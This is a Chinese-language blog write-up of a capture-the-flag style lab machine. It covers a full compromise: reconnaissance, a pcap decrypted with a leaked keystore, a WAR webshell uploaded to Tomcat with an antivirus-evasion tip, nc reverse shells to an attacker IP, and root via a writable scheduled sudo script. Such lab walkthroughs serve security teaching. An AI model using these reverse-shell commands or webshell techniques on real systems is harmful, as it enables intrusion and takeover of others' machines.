外网艰难打点到Linux提权

admin 2022年7月17日04:16:36评论13 views字数 2163阅读7分12秒阅读模式

0x01 外网艰难打点

首先使用另外一张网卡,将机器NAT连接

外网艰难打点到Linux提权

使用arp-scan -l扫描内网分配的IP

外网艰难打点到Linux提权访问192.168.110.140

外网艰难打点到Linux提权

先用NMAP开路

nmap -sV 192.168.110.140

外网艰难打点到Linux提权

端口全开,有问题,我们从web页面下手,先查看网页有什么信息,先查看源码

外网艰难打点到Linux提权

发现了一串字符

Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo

这个字符为base64,我们进行解密

外网艰难打点到Linux提权

pgibbons:damnitfeel$goodtobeagang$ta,是账号和密码,我们点击图片,并进行了url跳转

外网艰难打点到Linux提权

点击左边每个按钮

外网艰难打点到Linux提权

我们查看源代码,并没得到可用的消息,点击按钮第一个是首页、第二个是一张合照、第三个是订书机的照片、第四个跳转到了一个登录界面。

用刚刚破解出来的密码尝试登陆,pgibbons是账号,damnitfeel$goodtobeagang$ta是密码

外网艰难打点到Linux提权

登录成功之后,是空白的页面

外网艰难打点到Linux提权

我们再返回到之前的页面,在点击跳转邮箱。

进到了一个邮件系统,让我们查看一下收件箱,进行基本的信息收集。

第1封邮件,主要内容:让你的团队只能向管理门户发布任何敏感的内容。我的密码非常安全,发自ImpressCMS Admin Bill

第2封邮件,主要内容:Michael采购了IDS/IPS。

第3封邮件,主要内容:有一个peter的SSL证书被保存在192.168.110.140/.keystore

外网艰难打点到Linux提权

外网艰难打点到Linux提权

我们得到一个192.168.110.140/.keystore链接

访问把他下载下来

外网艰难打点到Linux提权

 并且访问到目录浏览,得知中间件是Apache/2.4.7 服务器是Ubuntu 外网艰难打点到Linux提权

点击这里,有一个流量文件

外网艰难打点到Linux提权

并且获得了几个关键的信息,这个pcap文件是红队的重新攻击产生的,但是不能读取文件。而且别名、Keystore密码、key密码都设置成tomcat。

外网艰难打点到Linux提权

由此推测:

a.这是一个流量包文件,不能读取很可能因为某些流量有SSL加密(前面的邮件中提供了一个keystore,这里提供了密码,是解密SSL密钥)

b.系统中可能存在tomcat。

把两个文件,放到一个文件夹里面,使用keytool工具解密,从秘钥库导出.p12 证书

keytool -list -keystore keystore

外网艰难打点到Linux提权

导出名为 admin.p12 的文件

keytool -importkeystore -srckeystore keystore -destkeystore admin.p12 -deststoretype pkcs12

外网艰难打点到Linux提权

使用wireshark解密 外网艰难打点到Linux提权

 外网艰难打点到Linux提权

点开Protocols,寻找TLS 或者SSL,填写靶场IP地址、端口、协议、Key文件路径、密码

外网艰难打点到Linux提权

将弹出来的窗口点击OK,然后打开流量文件,过滤项仅保留HTTP协议

外网艰难打点到Linux提权

可以看到所有的HTTP流量,然后我们右键追踪HTTP

外网艰难打点到Linux提权

可以看到他GET请求了/_M@nag3Me/html页面,并且输入了账号密码,密码为base64加密,解密之后为:Tt5D8F(#!*u=G)4m7zB

外网艰难打点到Linux提权


0x02 流量包泄露到Linux提权

登录后台时需要处理一下,设置代理为本地代理,才能访问,而且必须要HTTPS 外网艰难打点到Linux提权

账号为之前我们base64解密出来的账号和密码,进来之后往下滑 看到了一个文件上传,而且是可以上传任意文件,我们这里上传shell

外网艰难打点到Linux提权

因为是tomcat,我们这里把shell添加成ZIP后缀的压缩包,然后直接重命名修改为war后缀的文件,再进行上传(这里因为靶机存在查杀Webshell的工具,每隔一段时间shell就被删除了)然后我们使用冰蝎马,因为是加密传输所以并没有被杀掉

外网艰难打点到Linux提权

这里我们使用ncshell弹到Kali,Kali使用nc进行监听

nc -l -p 4444

冰蝎执行反弹命令

nc -nv 192.168.1.1 -c /bin/bashl -p 4444

接收到弹回来的shell之后我们使用Python写一个交互式的shell

Python -c ‘import pty;pty.spawn(“/bin/bash”)’

外网艰难打点到Linux提权

然后在网站的目录下找到数据库的账号和密码

 外网艰难打点到Linux提权

连接数据库,在数据库中找到机器ssh的用户的密码

外网艰难打点到Linux提权

密码进行md5解密,直接登录靶机,账号milton,密码thelaststraw

 外网艰难打点到Linux提权

history命令看到用户提权到blumbergh用户的记录,blumbergh用户密码保存在images目录下的图片里,使用strings命令查看,bill.png发现了隐藏的密码,密码是coffeestains

 外网艰难打点到Linux提权

切换过来之后我们查看sudo权限运行的程序,发现一个sudo权限运行的sh脚本

外网艰难打点到Linux提权

利用这个脚本来给我们弹回来一个shell

echo"nc 192.168.1.1 4444 -e /bin/bash" >> shell.txt
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

然后Kali进行监听,因为该脚本为定时执行,我们只需要等待shell弹回来即可 

外网艰难打点到Linux提权


欢迎 点赞留言分享至朋友圈 三连



 好文推荐  


原文始发于微信公众号(雾晓安全):外网艰难打点到Linux提权

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
未分类
admin
  • 本文由 发表于 2022年7月17日04:16:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   外网艰难打点到Linux提权http://cn-sec.com/archives/1181449.html

发表评论

匿名网友 填写信息